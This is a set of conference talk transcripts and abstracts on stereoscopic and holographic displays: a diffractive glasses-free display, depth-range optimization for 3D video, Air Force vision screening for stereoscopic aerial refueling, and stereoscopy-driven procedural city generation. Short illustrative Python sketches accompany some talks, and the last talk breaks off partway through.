a special way, either with white light or with different colors of light, but we have to be very careful how we illuminate the system, and what we get are light rays that possibly come from different positions but that are parallel. So they define the same exact set of views. So when you look at our display, you don't see any color bleeding. If you want to create a white object, it's perfectly white, including at the edges. That's the really hard part about diffraction. So that's where all the work has to go, when you look at the details, to get a high-quality display. Perfect. So now just a little bit of, not marketing, but I want to describe the company, just to tell you what it takes, right? We founded it two years ago; we spun out of HP Labs. We're about 25 employees and we have operations in Menlo Park and Palo Alto. Believe it or not, we actually bought an ASML stepper, and that's how we prototype all of our displays. The stepper is an optical lithography tool; we can go down to 85-nanometer resolution. Okay. So we have 12-inch wafers, so any display small enough to fit on a 12-inch wafer we can prototype in less than a week, just the time it takes to get a mask from Toppan, which is very fast.
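As an illustration of the view-profile shaping described above, here is a small sketch that builds flat-top angular profiles with a controlled overlap between neighbouring views and a graceful fade at the outer edge. The widths, roll-offs and the 8-view/60-degree layout are assumptions, not the product's actual radiation patterns.

```python
import numpy as np

def flat_top(theta, center, width, roll_off):
    """A smooth flat-top profile: ~1 inside |theta - center| < width/2,
    with a raised-cosine roll-off of 'roll_off' degrees on both sides."""
    d = np.abs(theta - center) - width / 2.0
    w = np.clip(1.0 - d / roll_off, 0.0, 1.0)
    return 0.5 - 0.5 * np.cos(np.pi * w)

# Illustrative 8-view layout over roughly 60 degrees, with a small overlap
# between neighbours for smooth transitions and a global fade at the edges
# instead of a jump back to view 1.
theta    = np.linspace(-45, 45, 1801)
centers  = np.linspace(-26.25, 26.25, 8)                 # 8 views, 7.5 deg apart
profiles = [flat_top(theta, c, width=6.0, roll_off=2.0) for c in centers]

edge_fade = flat_top(theta, 0.0, width=52.5, roll_off=6.0)   # graceful edge fade-out
profiles  = [p * edge_fade for p in profiles]
```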
So essentially we prototype and manufacture the backlight in Palo Alto, and then we have a pilot assembly line in Suzhou that aligns the backlight to the LCD panel. From that pilot line, we transfer the process to a module assembly house in Asia, usually in China. So it's quite a heavy operation, but it's hardware, so we have to do it. Another point is that we're able to use the existing 3D ecosystem. You probably heard the previous speaker talk about RealSense. We use RealSense; I'll show you how we map facial expressions onto 3D avatars, for example. We were on CNN recently: we can take your facial expressions and map them onto a monkey, so it looks like we're transforming you into a monkey, and it's 3D and it's really nice. We have a Unity plugin that lets us take any Unity content and essentially make it compatible with our platform, so you can play Unity games on our platform. We support Leap Motion. We have WebGL, so you can go and have fun online. Most of our demos are rendered in the browser today, and it's quick and easy to program in JavaScript. So that's an example. If you were there last night, some of you might have gotten to play with it. This is a CT scan of a former colleague of mine at HP, turned into a 3D model of his spine, and you get to interact with it with a Leap Motion in real time. You can manipulate the hologram; it's quite fun. This is the demo that I mentioned. This is essentially what you would see: you're in front of the display, we have a RealSense unit that is capturing your facial expression, and in real time it is mapping that expression onto this 3D hologram of a monkey. So that's quite fun. And I want to leave you with that last image of the vision again: the digital world materialized. This is really meant to be the user interface of the future, and we hope we'll get there soon. So thank you for your attention. Thank you.
|
Ever since Doug Engelbart presented the first modern computer interface with his famous “Mother of All Demos,” we have strived to achieve more intuitive ways to interact with digital information. That interface has not fundamentally changed over the past half-century, though, even as the scope of information continues to exponentially increase. As we now look to computerized AI to help us navigate and make sense of all of our shared data, we also require a new way to present the information that is intuitive and useful to us. Holographic Reality (HR) is based on “holographic” 3D screens that do not require any eyewear to function. These screens must produce realistic, full-parallax 3D imagery that can be manipulated in mid-air by finger or hand gestures. They must provide the same high quality imagery throughout the field of view, no jumps, bad-spots or other visual artefact. Augmented by Haptic technology (tactile feedback), these screens will even let us “feel” the holographic content physically at our fingertips. © 2016, Society for Imaging Science and Technology (IS&T).
|
10.5446/32248 (DOI)
|
Hello and welcome. Thanks for attending my presentation about an automated approach for depth adaptations of stereoscopic videos. My name is Werner Zellinger and I'm a junior researcher at the Software Competence Center Hagenberg in Austria. This work was developed in cooperation with emotion3D GmbH, in particular with Florian Seitner, and with the Vienna University of Technology, with Matej Nezveda and Margrit Gelautz. Our small industrial research company is in the heart of Europe, in Austria, 175 kilometers away from Vienna, where the Vienna University of Technology and our project partner emotion3D are located. This is a picture. Depth-image-based rendering methods enable the creation of virtual views from color and corresponding depth images. This enables us to optimize for the best viewing comfort and quality of experience. In this approach, we propose to model the quality of experience maximization as a linear optimization problem with the goal of predicting optimal depth range adaptations. The work is structured as follows. First, I will introduce a 3D quality of experience model from the literature. The main part of this presentation will be the introduction of the optimization problem. As an intermediate result, I will present a new motion-based comfort zone and some human visual attention data. Finally, some subjective assessment results and statistical results are shown. Following Chen, a novel model of the quality of experience can conceptually be split into three aspects: visual discomfort, depth quantity and image quality. Visual discomfort refers to the subjective sensation of discomfort someone can experience when watching stereoscopic images or videos. Depth quantity refers to the perceived amount of depth, and image quality refers to quality aspects like color, noise or artifacts. One challenge of stereoscopic post-production is therefore maximizing the depth quantity and minimizing visual discomfort while the image quality is not deteriorated. In this approach, we propose to model these three objectives and combine them in order to come up with an overall model for quality of experience maximization. We propose to model the visual discomfort by the depth distance between the object of interest and the screen, since if the depth difference between the most attracting image parts and the screen increases, the accommodation-vergence conflict also increases, which is known to be a main influencing factor of visual discomfort. We propose to model the depth quantity simply by the depth range, and the deterioration of the image quality by a complexity measure of the depth mapping operator; in our case, for linear depth mapping operators, simply by the scaling amount. In addition, we propose the following two constraints: a comfort zone that limits the depth values of a stereoscopic video, and a depth continuity constraint that limits depth jumps of the objects of interest across shot transitions. By using these models, one can implement the following optimization procedure. The optimization algorithm aims at computing linear depth mapping operators for shots. We use shots of stereoscopic videos as optimization elements, since they form a natural partition of the stereoscopic video into frames of similar characteristics. At the beginning, we extract some shot features like motion characteristics or saliency features. These features are then used by the comfort zone model and the depth continuity constraint. In addition, these shot features are also used by our depth quantity and visual discomfort models.
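A minimal sketch of the three quality-of-experience terms described above, for a linear depth mapping operator d' = s·d + t applied to one shot. The specific weights and shot features below are placeholders for illustration, not the paper's calibrated model.

```python
# Sketch of the three QoE terms for a linear depth mapping operator
# d' = s * d + t applied to one shot; weights and shot data are assumptions.

def depth_quantity(s, shot):
    """Depth range of the shot after mapping (larger is better)."""
    return s * (shot["d_max"] - shot["d_min"])

def visual_discomfort(s, t, shot, d_screen=0.0):
    """Distance between the mapped object of interest and the screen plane
    (proxy for the accommodation-vergence conflict; smaller is better)."""
    return abs(s * shot["d_object_of_interest"] + t - d_screen)

def quality_deterioration(s):
    """Deterioration proxy: how strongly the operator rescales depth."""
    return abs(1.0 - s)

def qoe(s, t, shot, w=(1.0, 1.0, 1.0)):
    wq, wd, wi = w   # assumed weighting of the three terms
    return (wq * depth_quantity(s, shot)
            - wd * visual_discomfort(s, t, shot)
            - wi * quality_deterioration(s))

shot = {"d_min": -0.4, "d_max": 0.9, "d_object_of_interest": 0.5}
print(qoe(0.7, -0.1, shot))
```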
The optimization algorithm then decides which depth mapping operator corresponds to which stereoscopic shot in order to maximize the quality of experience subject to our constraints. Now, mathematically speaking, the measures for the depth quantity, visual discomfort and the deterioration of the image quality can be modeled as functions that take a depth mapping operator and a stereoscopic shot and return the needed value. For example, a model for the depth quantity takes a linear depth mapping operator with scaling parameter and shift parameter and returns the depth range of the stereoscopic shot after the application of the linear depth mapping operator. By using these functions, we can combine them in order to come up with an overall model for the quality of experience. In addition, we model the comfort zone, which consists of a minimum and a maximum limit and limits the depth values of the frames of the depth-mapped shot. Please note that in contrast to standard comfort zones, we allow more flexibility by also taking shot features into account. The depth continuity constraint is modeled by a parameter lambda that limits the absolute difference between the depth of the object of interest in the last frame of shot i and that of the object of interest in the first frame of shot i plus 1. By using this, we come up with a linear optimization problem: we maximize over the depth mapping operators and sum up the quality of experience models for each of the n shots, subject to the comfort zone and the depth continuity constraint. Let us consider the constraints in more detail. Several comfort zones have been proposed in the literature: for example, the depth of field can be taken as a comfort zone, the 3%-of-image-width-based comfort zone, and the 1-degree-of-visual-angle-based comfort zone. However, in our experimental analysis, we observed that when considering high-motion shots, stereographers tend to use much smaller depth ranges than these limits allow. This figure shows our experimental analysis of 200 randomly taken shots from five famous 3D movies. The horizontal axis shows the mean length of the optical flow motion vectors in the shot; the vertical axis shows the minimum disparity of the shot. It can be seen that for shots with high motion characteristics, the stereographers of the five movies use smaller limits than the famous limits allow. Of course, this is not unexpected, since high motion characteristics are known to influence visual discomfort, but it enables us to define the new motion-based comfort zone shown by the black line. Please note that the depth continuity constraint needs the computation of a human visual attention model. We use the following model: we combine a motion map computed by means of optical flow motion vectors, a disparity map computed by means of the emotion3D Stereoscopic Suite for After Effects, a spectral residual saliency map of the left image, and a center bias. Our experimental analysis is based on subjective assessment ratings of 17 subjects. We used 12 videos: five high-motion self-captured videos, five high-quality videos from the MMSP group, and three videos produced with an algorithm published in the International Journal of Computer Vision by Yan in 2013. We asked the subjects for depth quantity, visual comfort, and image quality. We conducted our setup following an ITU recommendation report, and for reference, we made all videos and subjective assessment ratings publicly available.
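The shot-wise linear program can be sketched as follows. This simplified version optimizes only the scaling factor of each shot (the paper's operators also include an offset, and its comfort zone depends on motion features); all numbers, weights and shot data are assumptions for illustration.

```python
import numpy as np
from scipy.optimize import linprog

# Minimal sketch of the shot-wise linear program, simplified to scale-only
# operators d' = s_i * d.  Depths are in display units with 0 at the screen.
shots = [  # per shot: depth range, object-of-interest depth (overall / at cut)
    dict(d_min=-0.6, d_max=1.0, d_oi=0.5, d_oi_first=0.4, d_oi_last=0.6),
    dict(d_min=-0.3, d_max=1.4, d_oi=0.9, d_oi_first=0.8, d_oi_last=1.1),
]
wq, wd, wi = 1.0, 0.8, 0.3          # assumed weights of the three QoE terms
cz_min, cz_max = -0.5, 0.8          # assumed comfort zone limits
lam = 0.2                           # assumed depth-continuity limit

n = len(shots)
# maximize sum_i  wq*s_i*range_i - wd*s_i*|d_oi_i| - wi*(1 - s_i)
# -> minimize c @ s  (the constant term wi*n drops out)
c = np.array([-(wq * (sh["d_max"] - sh["d_min"]) - wd * abs(sh["d_oi"]) + wi)
              for sh in shots])

A_ub, b_ub = [], []
for i, sh in enumerate(shots):
    row = np.zeros(n); row[i] = sh["d_max"]        # mapped far depth <= cz_max
    A_ub.append(row); b_ub.append(cz_max)
    row = np.zeros(n); row[i] = -sh["d_min"]       # mapped near depth >= cz_min
    A_ub.append(row); b_ub.append(-cz_min)
for i in range(n - 1):                              # |depth jump at the cut| <= lam
    row = np.zeros(n)
    row[i], row[i + 1] = shots[i]["d_oi_last"], -shots[i + 1]["d_oi_first"]
    A_ub.append(row); b_ub.append(lam)
    A_ub.append(-row); b_ub.append(lam)

res = linprog(c, A_ub=np.array(A_ub), b_ub=np.array(b_ub),
              bounds=[(0.0, 1.0)] * n, method="highs")
print("per-shot depth scaling factors:", res.x)
```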
This figure shows the results for the algorithm of Yan and our results on the bottom. The mean opinion scores are shown for visual comfort, image quality, and depth quantity. It can be seen that the mean level of depth quantity, image quality, and visual comfort for the videos of Yan is lower than for our videos. This result can be formulated similarly for all 24 videos. We split the set of all subjective assessments for depth quantity, visual discomfort, and image quality into two sets: one set for the original videos and one set for the mapped videos. We obtained the following result: the mean level of visual comfort is significantly higher for the mapped videos than for the original videos. The levels of image quality and depth quantity could not be observed to be statistically significantly different. I put references on this slide, including my mail address, and thank you for your attention.
|
Depth-Image Based Rendering (DIBR) techniques enable the creation of virtual views from color and corresponding depth images. In stereoscopic 3D film making, the ability of DIBR to render views at arbitrary viewing positions allows adaption of a 3D scene’s depth budget to address physical depth limitations of the display and to optimize for visual viewing comfort. This rendering of stereoscopic videos requires the determination of optimal depth range adaptions, which typically depends on the scene content, the display system and the viewers’ experience. We show that this configuration problem can be modeled by a linear optimization problem that aims at maximizing the overall quality of experience (QoE) based on depth range adaption. Rules from literature are refined by data analysis and feature extraction based on datasets from film industry and human attention models. We discuss our approach in terms of practical feasibility, generalizability w.r.t different content and subjective image quality, visual discomfort and stereoscopic effects and demonstrate its performance in a user study on publicly available and self-recorded datasets. © 2016, Society for Imaging Science and Technology (IS&T).
|
10.5446/32251 (DOI)
|
Dr. Marc Winterbottom is a senior research psychologist supporting the Operational Based Vision Assessment laboratory. His most recent research focuses on U.S. Air Force vision standards and modernization of vision screening practices. The title of his presentation is Stereoscopic Remote Vision System Aerial Refueling Visual Performance. Please. Okay. Thank you. Good morning. So I'll be looking at performance and comfort with the use of stereoscopic aerial refueling systems. So hopefully this will be an interesting application that you'll get to hear a little bit about this morning. Just the usual disclaimer here before I get started. First, just to provide a little bit of context: I work for the Air Force School of Aerospace Medicine, and I'll provide a little bit of background on our laboratory. I work for the Operational Based Vision Assessment laboratory, so we're really interested in modernizing Air Force vision screening and standards, that is, testing the vision of our aircrew, our pilots, and other operators of our aircraft to make sure their vision is good enough for the very complicated tasks that they're doing. And there's kind of a general debate going on right now in a lot of countries: if you establish a particular medical standard, it's now becoming much more important for the organization to say how that is actually related to the task, being able to say that it is an occupationally relevant medical standard that you're drawing, because that can sometimes be a very contentious issue. And in our case, we're sometimes making career-ending decisions based on a vision test. We do end a pilot's entire career sometimes just on the basis of a single vision test. So it can be a very big deal. So these are some general capabilities of our laboratory, in addition to what I'm talking about today. The biggest part of our lab is a very high-resolution simulation facility, which you see here in the upper right. So we have daylight levels of luminance, daylight to nighttime, and a 20/10 level of visual acuity. We use that laboratory to test our aircrew or other subjects' vision under operational flight simulation conditions. We're also looking at head-mounted display performance and how visual health interacts with the use of those types of devices. We're using virtual reality as well to look at, for example, helicopter landing and whether depth perception is important in those kinds of circumstances. And then today I'll be talking about our aerial refueling work. So the Air Force is now in the process of buying the new KC-46, a new aerial refueling tanker. Several other countries are already in the process of buying very similar tankers. So we're going from the situation which you see here on the left: here's a boom operator, and I don't know how well you can see it, but he's got his chin in a chin rest, and he's laid out in the tail end of the aircraft, looking out a window to do his refueling task and to fly the boom to do the aerial refueling. So now we're moving to this. This is the Australian KC-30. This is showing their boom enhanced vision system. So in the upper panel here is a set of 2D displays, which they use to look out behind the aircraft with a wide field of view. And then this is the stereoscopic display. So they're using this window now in place of a direct-view window to do the refueling task. And so that's a stereo view of the receiver aircraft and the boom. So it's really a much different situation.
We've been using this for decades, looking straight out a window. The boom operator is now located up in the cockpit with the pilot and co-pilot. So it's much more comfortable for them, but there's now a lot of technology, cameras, and 3D displays in between them and the receiver aircraft. So quite different. From an aeromedical perspective, we were very concerned about whether our vision standards, our current policies for screening aircrew, were really applicable to this new situation. The Air Force does maintain certain minimum standards relevant to depth perception and how well your eyes maintain alignment with each other. But those are World War II era. They certainly predate the use of these kinds of displays and remote vision technology. I won't really talk very much today about what those policies are or the particular tests that we use, but just for example, the depth perception test is really not designed to screen people out. So we have three different stereo acuity tests. They're all very old, Titmus-type circles tests. And if you fail the first one, we basically say, okay, try this other one. That one's actually even easier and less discriminating. And if you fail that, we say, okay, try this other test. So the tests are really not designed to filter people out. They're really designed to be pretty inclusive and really only identify very gross deficiencies. So that may not be the best thing to do for this new system. There are also, as I'm sure we're going to hear a lot about this week, reasons to be concerned. There are certainly certain parts of the population that are probably likely to have difficulty using stereoscopic displays and similar technologies. I'm talking more about flat-panel stereoscopic displays today, but head-mounted displays have similar issues. The Japan Air Self Defense Force, for example, uses a head-mounted display in place of the flat panel. They probably will face very similar issues. It's a little bit different technology, but similar issues. We know that there's maybe up to 20% of the population that could very well have difficulties. So from an aeromedical perspective, we are quite concerned about this. There are a lot of reasons why stereo displays could cause some issues for certain people. For this audience, I think you're probably all very familiar with a lot of those issues. I won't talk a lot about those today, but one thing I did want to point out: this is actually a hyperstereoscopic system. So this shows the bottom of a KC-30, and that's the camera bay right there. It's a very big aircraft, so they look kind of small there, but those cameras are pretty widely separated, so it's a hyperstereo viewing condition. So that brings with it some of its own potential complications. So to study this, we built our own simulation in our laboratory. That's what you see here on the right. So similar to the picture I showed earlier, we've got a bank of 2D panoramic displays that looks out behind a simulated aircraft, and then our subject is looking here at this 3D display to do our simulated aerial refueling task. And for our simulation, we're just using a ViewSonic passive polarizing 3D stereo display. These are just standard 2D monitors. We worked very closely with the KC-46 program office, Boeing and FlightSafety. FlightSafety is the supplier of the training system for our new tanker. To head off some questions that I'm sure will come later, I can't talk very much at all about the exact configuration of the cameras. It's not really an Air Force issue.
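A back-of-the-envelope sketch of why the wide camera separation matters: relative angular disparity grows roughly linearly with the baseline, so a hyperstereo rig magnifies depth differences relative to natural viewing. The numbers below are purely illustrative assumptions; the actual KC-46/KC-30 camera geometry is proprietary and not represented here.

```python
import numpy as np

def relative_disparity_deg(baseline_m, z_near_m, z_far_m):
    """Angular disparity difference between objects at z_near and z_far for a
    converged stereo pair with the given baseline (small-angle approximation)."""
    disp = baseline_m * (1.0 / z_near_m - 1.0 / z_far_m)   # radians
    return np.degrees(disp)

eye_baseline = 0.065                 # typical interpupillary distance, metres
cam_baseline = 0.60                  # assumed wide camera separation, metres

for b, label in [(eye_baseline, "natural viewing"), (cam_baseline, "hyperstereo")]:
    d = relative_disparity_deg(b, z_near_m=18.0, z_far_m=22.0)
    print(f"{label:16s}: {d*3600:8.0f} arcsec between objects at 18 m and 22 m")
```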
It's a Boeing intellectual property proprietary issue. But we do think that our simulation was quite representative of the actual system. We actually had some boom operators come in, fly it. They were pretty happy with the simulation, and then it looked quite similar to what they saw with the actual system. So what we're particularly interested in, again, is correlating vision test scores with operationally relevant performance. So in this case, aerial refueling. So again, I'm not going to talk very much about our older standard tests. We pretty much suspected early on that those were probably not worked that well for predicting performance. So we developed our own suite of vision tests, in particular, stereo acuity. This is what our stimulus looks like for the stereo acuity test. This is a threshold level stereo acuity test. So for those subjects with very good stereo acuity, we could actually measure down to single digit arc second level of stereo acuity. So we could pretty accurately assess their level of stereo acuity. We did a fusion range test as well to measure how well they could accommodate, basically cross and uncross their eyes before they would go diplopic or get a double image. Then we also worked with a company called Adaptive Sensory Technology to do a contrast sensitivity test. These are what the stimuli look like for the contrast sensitivity test. So much more accurate than our normal basic SNEL and acuity charts, and again, a threshold level kind of contrast sensitivity test. So those were our three main vision tests that we used to correlate performance. For Experiment 1, we focused really specifically on comparing different viewing methods. So we took, compared the KC46 hypersterioscopic viewing configuration, compared that to a normal stereo, and then also 2D, or just a single camera view. For a decent size group of subjects, but not a really large number. Just to look at what the effect of stereo was. So we do get a very reliable effect of stereo. If we compare normal stereo to 2D, we do get an improvement in our aerial refueling performance. So our subjects, on average, could much more accurately and quickly fly the boom to make contact with the receiver aircraft. Then we got another increase in performance when they switched to that to a hypersterioscopic view. So clearly the addition of stereo or hypersterio is helpful for this task. Really if you were going to pick a task where you might expect stereo to make a difference, this is probably it. You're basically maneuvering two things in depth to make contact with each other. So it is a good candidate for the use of stereo displays. But if we separate our subjects out into two groups, and we just simply separated them on the basis of above average or below average on those set of three tests, contrast sensitivity, stereo acuity, and fusion range. Our subjects that fall into the poor vision group, they either don't benefit from the addition of the stereo, or for hypersterio, they look like they may actually get worse. So we have some initial indication that some people probably do not cope very well with the particular hypersterioscopic configuration we used, or that is going to be used with the KC-46 tanker. So for experiment two, we wanted to look at this a lot more closely. So we took a much larger group of subjects. We're also very interested in how well people do over a long period of time. For the refueling mission, they can be doing that for several hours at a time. 
So we wanted to look at what the effect of looking at the system was over a two-hour time period. We also wanted to make sure that we were basically replicating what our boom operators have to do. So there we had our subjects alternate pretty frequently between the 2D and the hyperstereo 3D display, as they would if they were actually refueling an aircraft. So we did what we call a fighter drag simulation, just repeatedly refueling like a fighter squadron, not like a long mission flying over an ocean, something like that. So we had about 30 subjects. We put them through a pretty comprehensive vision screening that included the three tests that I mentioned earlier. And we had them do the refueling task. We were also very interested in their level of fatigue and discomfort. So we administered a questionnaire about every 10 minutes during those two hours to assess eye fatigue, eye strain, eye tiredness, and headache throughout the two-hour time period. So these are the results of the subjective questionnaire. Pretty much everybody was able to finish the task. We didn't get anybody who was so uncomfortable that they just quit and left the experiment. But we did get people like this who just maxed out on the discomfort ratings pretty quickly, and a couple of people who complained of diplopia throughout a significant portion of that two-hour time period. So we did get people who were very uncomfortable doing this task. But by and large, more of our subjects had a profile that looked more like this. So most of our subjects were pretty comfortable doing this task for even as long as two hours. So it was more the case that most people were fairly comfortable. So what we're particularly interested in is the relationship between the vision tests and how well they did on this pretty complex task using a 3D display. So these are the correlations between our three vision tests and our aerial refueling performance metric. For the refueling metric, we're measuring things like how long it took them, how many connections they made throughout that two-hour time period, and whether they collided with the aircraft or rammed the boom into our simulated aircraft. We combine that into a single metric. If we correlate the vision scores with that metric, actually all three of these are very strongly related to performance with the stereoscopic remote vision system. Fusion range in particular was also very strongly correlated with ratings of discomfort and eye fatigue. So we've got potentially a set of vision tests here that we can use from an aeromedical perspective to test boom operator candidates before they actually get selected for training. One thing I just wanted to mention briefly: we did get a pretty big effect of age, which is kind of interesting. So we did not really screen people out for any particular reason for this task. Our boom operators can be older, especially for the Air Force National Guard or reserves. They can definitely be well over the age of 40, so we did not screen people out for age. But we did find that our younger observers were much more likely to report higher levels of discomfort and fatigue. So this is the over-30 group. I don't think anybody in that group complained really at all, and that included some people who were well outside the Air Force vision standards. One guy in this group had a very large phoria, but didn't complain. So although there might have been some reasons for them to complain, they were basically fine.
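The analysis style described above, combining the refueling sub-measures into one composite metric and correlating it with each vision test score, can be sketched as follows. The data and weighting below are random placeholders for illustration, not the study's measurements.

```python
import numpy as np
from scipy.stats import pearsonr

rng = np.random.default_rng(0)
n_subjects = 30

time_to_contact = rng.normal(40, 8, n_subjects)      # seconds (lower = better)
n_contacts      = rng.normal(25, 5, n_subjects)      # contacts per 2-hour block
n_collisions    = rng.poisson(1.0, n_subjects)

def zscore(x):
    return (x - x.mean()) / x.std()

# Composite refueling metric (higher = better); equal weighting is an assumption.
performance = zscore(n_contacts) - zscore(time_to_contact) - zscore(n_collisions)

vision_tests = {
    "stereo acuity (log arcsec)": rng.normal(1.3, 0.4, n_subjects),
    "fusion range":               rng.normal(25, 8, n_subjects),
    "contrast sensitivity":       rng.normal(1.9, 0.2, n_subjects),
}
for name, scores in vision_tests.items():
    r, p = pearsonr(scores, performance)
    print(f"{name:28s} r = {r:+.2f}  (p = {p:.3f})")
```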
So that at least suggests that the vergence-accommodation mismatch is one source of discomfort when using a system like this. So just to wrap up quickly: a couple of pretty positive findings from our initial results. I think it's safe to say, at least on the aeromedical side, that there was a lot of skepticism about going from the old direct-view system to using all this technology and stereoscopic displays. But we do clearly see, at least in our simulation, that stereo, and probably hyperstereo, for most people does improve performance. And we found that most of our subjects were quite comfortable doing this, even over a pretty long viewing period. Clearly, we did find that a percentage of the population we tested had a very difficult time using the hyperstereo remote vision system. Their quality of vision, their ocular alignment, their stereo depth clearly make a difference in being able to perform this task well. For us, that's very important. Flying a boom, doing refueling, that's a very dangerous task. So all the boom operators we talked to pretty much said, oh, no, they never hit the receiver aircraft with the boom. But when we talked to the pilots, it was a little bit different story. They get pretty irritated if it takes a long time, because they're flying on fumes. Sometimes they need to make contact quickly. One pilot actually told us a boom operator jammed the boom right through the canopy of an aircraft and almost impaled the guy inside. So it's a potentially very dangerous task. We want to make sure that, if we can identify those people ahead of time with a carefully selected set of vision tests, we do. It's also an important training issue. We'd rather not select people and spend hundreds of thousands of dollars on them in training only to have them fail out. So it would be very cost effective if we can identify people ahead of time who visually are just not really capable of doing this task for a long period of time. So we are planning to continue this research. Hopefully later this summer we'll kick this off. These are, as I said, potentially career-ending kinds of decisions. So we had a pretty good group of subjects, almost 30 people, but we really need a larger group to make specific recommendations on pass/fail levels of stereo acuity or fusion range, to make sure we're really accurately identifying the right people to go on to training or to be screened out. And I didn't mention earlier that for this simulation we really assumed everything was perfectly set up. So in our simulation the cameras are perfectly aligned and there is equal contrast between the cameras, so very ideal visual conditions. For our next round of research we'd really like to look at degraded visual conditions as well, possibly a little bit of camera misalignment that could just occur during missions or through maintenance issues. And we suspect that people who have less than perfect ocular health may actually have even greater difficulty under those conditions. Okay, so thank you. Thank you.
|
The performance and comfort of aircrew using stereoscopic displays viewed at a near distance over long periods of time is now an important operational factor to consider with the introduction of aerial refueling tankers using remote vision system technology. Due to concern that the current USAF vision standards and test procedures may not be adequate for accurately identifying aircrew medically fit to operate this new technology for long mission durations, we investigated performance with the use of a simulated remote vision system, and the ability of different vision tests to predict performance and reported discomfort. The results showed that the use of stereoscopic cameras generally improved performance but that individuals with poorer vision test scores performed more poorly and reported greater levels of discomfort. In general, newly developed computer-based vision tests were more predictive of both performance and reported discomfort than standard optometric tests. © 2016, Society for Imaging Science and Technology (IS&T).
|
10.5446/32253 (DOI)
|
David Gatta, and he's going to be presenting Stereoscopy-based procedural generation of virtual environments. David received his Master of Science and PhD in Computer Science from the University of Milan. Okay, thank you, Chris, and hello everyone. What I'm presenting today is an application of stereoscopic parameters inside computer graphics, in particular in a specific field of computer graphics, which is procedural modeling and procedural generation of virtual scenes. You may have seen some examples of procedural generation in the 3D theater last Monday. It's something that is more and more used in movies and video games: the generation of a lot of models, trees, buildings in an automatic or semi-automatic way. These scenes are often visualized in 3D. The point is that often, to my knowledge at least, the stereoscopic parameters are not used as a direct parameter to generate the models inside the scene. So what I propose in this paper is to generate a scene using stereoscopy from the very beginning of the creation of the scene. We can go back to the comment Neil Dodgson made last Monday about the use of stereoscopy to create something creative, creative tools for creative stereoscopy. And to do that, we need tools that allow the designer of stereoscopic scenes to use all the stereoscopic settings from the beginning. Just to give a brief introduction to procedural modeling: procedural modeling is based on some equations, some set of rules applied to basic shapes, in order to automatically create a complex scene without having to model all the features in the scene manually. Very common examples are fractals, used to create some images or fractal terrains, and L-systems, in which, using some parameters and a set of rules, you can create complex shapes like trees. More recently, in more complex systems, there is the procedural creation of cities. This is a work from 2001, based on the use of some images giving information regarding the elevation of the terrain, the population density, and the presence of sea or lakes. You can generate a set of streets, and on these streets you can, using different rules, generate different kinds of buildings, creating something like this. Now, in this paper I consider the creation of some of these kinds of scenes using stereo parameters to rule the creation of the geometry. The idea is to create more effective and more pleasant stereoscopic scenes by using the stereoscopic parameters from the beginning of the production stages. I present a few simple examples of integration of stereoscopic parameters in the procedural pipeline of a computer graphics production software. The first is very simple, the automatic geometry filling of the stereoscopic camera frustum. And the second one is the automatic detection of window violations and the application of the floating window. We have decided not to develop a system from scratch, but rather to consider the integration of these techniques inside some already available tools, also opening the discussion of what is provided by the production tools when we talk about stereoscopy. Looking around, there are two kinds of production tools: some very specific ones like CityEngine, specific for the creation of cities, but they often do not provide stereoscopy. Considering general-purpose tools, we more or less end up with Houdini, which is a full production tool based on procedural generation.
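As a tiny illustration of the rule-based idea mentioned above, here is a textbook L-system rewriting step of the kind used to grow plant-like structures. This particular rule set is a generic example, not one taken from the paper.

```python
# F = draw forward, +/- = turn, [ ] = push/pop the turtle state.

def l_system(axiom, rules, iterations):
    s = axiom
    for _ in range(iterations):
        s = "".join(rules.get(ch, ch) for ch in s)   # rewrite every symbol
    return s

rules = {"F": "F[+F]F[-F]F"}
print(l_system("F", rules, 2))
# -> 'F[+F]F[-F]F[+F[+F]F[-F]F]F[+F]F[-F]F[-F[+F]F[-F]F]F[+F]F[-F]F'
```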
It provides stereoscopy, but the problem is that not all the parameters of the stereoscopic setup are exposed as tools inside the node-based generation of the scenes. So you can set up the stereoscopic camera and you can produce the stereoscopic image, but you cannot use the parameters of the stereoscopic setup in the production of the scene. So we have opted for a different approach. We have considered Blender, which is open source and provides a stereoscopy pipeline. It is not a procedural tool, but by using the Sverchok add-on from a Russian developer, it is possible to extend the node editor already present in Blender for creating materials and for the compositor, and to use it like Houdini to create geometry. In this case we have maximum flexibility: we have all the source code of Blender, we can do whatever we want, and we can check every step of the operations done inside Blender. Obviously this is particularly true for Sverchok; Sverchok is heavily in development, so you may lose stability as development goes on and new versions become available. But just to start exploring the topic and to do some preliminary tests, we found it the better solution. As a test scene, we decided to build a very simple scene, not as complex as in the previous work, mainly because we didn't have enough computational power; we are talking about hundreds of thousands of triangles in the scene. So, it's quite dark here actually, but we decided on a very simple rendering level, because the techniques we are proposing are independent of how much you push the rendering: you can do toon shading or photorealistic rendering. We are discussing the creation of the geometry, so at the moment we have decided to stay with an acceptable level of rendering. These techniques can also be integrated with other kinds of scenes, trees instead of buildings, particle systems; it doesn't matter, we are talking about the stereoscopic parameters and how we can use them. So I will not go into the details of the construction of the geometry, because it's not the topic of the paper. Simply, we start with a patch, we divide it with some scheme and some parameters, in this case some sort of diamond-based shape, to build the streets and lots, and then for each lot we calculate the height of the buildings, mainly randomly, but there are some parameters that the user can set. And with many blocks you can create a city; you can also select some blocks to be some sort of downtown with skyscrapers, with the others going down in a Gaussian way, but again, no more details. Let's go to the stereoscopic setup. The first technique is almost trivial. I was sure someone else had already considered it, but I have not found it published; maybe the production tools used in production companies, which are not publicly available, have used this for years, but nobody has discussed it. It's trivial: if I have to create 3D computer graphics, I have to decide the 3D position of an object in a scene. So let's use what is called in computer graphics camera space; let's decide the position using the camera as the origin of the world, and let's decide the depth, the Z position, of the objects considering the stereoscopic frustum, in order to have control of the final depth range of the scene and thus control of the final parallax on the screen. And using only one parameter, you can also re-edit the scene in case the material must be edited or converted for other setups or other possible solutions.
